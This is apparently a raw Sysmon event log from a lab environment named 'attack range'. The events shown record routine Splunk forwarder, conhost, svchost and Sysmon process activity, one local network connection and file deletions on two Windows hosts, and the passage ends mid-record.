AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000042118Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:31.605{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E487-63C7-2C06-00000000AF02}6664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042117Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:31.605{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042116Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:31.605{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042115Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:31.605{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042114Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:31.605{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042113Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:31.605{FE4C2B44-D9F3-63C7-0500-00000000AF02}408524C:\Windows\system32\csrss.exe{FE4C2B44-E487-63C7-2C06-00000000AF02}6664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000042112Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:31.605{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E487-63C7-2C06-00000000AF02}6664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000042111Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:31.465{FE4C2B44-E487-63C7-2C06-00000000AF02}6664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000016667Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:32.980{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E488-63C7-0802-00000000B002}660C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016666Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:32.980{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016665Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:32.980{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016664Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:32.980{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016663Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:32.980{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016662Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:32.980{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016661Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:32.980{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016660Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:32.980{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016659Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:32.980{E5A8D418-DC43-63C7-0500-00000000B002}416964C:\Windows\system32\csrss.exe{E5A8D418-E488-63C7-0802-00000000B002}660C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016658Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:32.980{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016657Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:32.980{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016656Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:32.980{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E488-63C7-0802-00000000B002}660C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000016655Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:32.981{E5A8D418-E488-63C7-0802-00000000B002}660C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000016654Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:32.949{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80ADD838377C0034076E25E0F2CBB86E,SHA256=5B9C531B94BACEE2EE0EA29BB4E1AEB13B448ADABE7DB64761624C44BF70D8D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000042160Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:32.987{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DA4C86BF68561DE8272C120564227B1,SHA256=E51F65E3842ACF5C538B9CADBFAF45EBB602667AFF65E59D281F391572BA0E31,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000042159Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:30.573{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56311-false10.0.1.12-8000- 10341000x800000000000000016653Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:32.531{E5A8D418-E488-63C7-0702-00000000B002}3644636C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016652Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:32.298{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E488-63C7-0702-00000000B002}3644C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016651Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:32.298{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016650Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:32.298{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016649Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 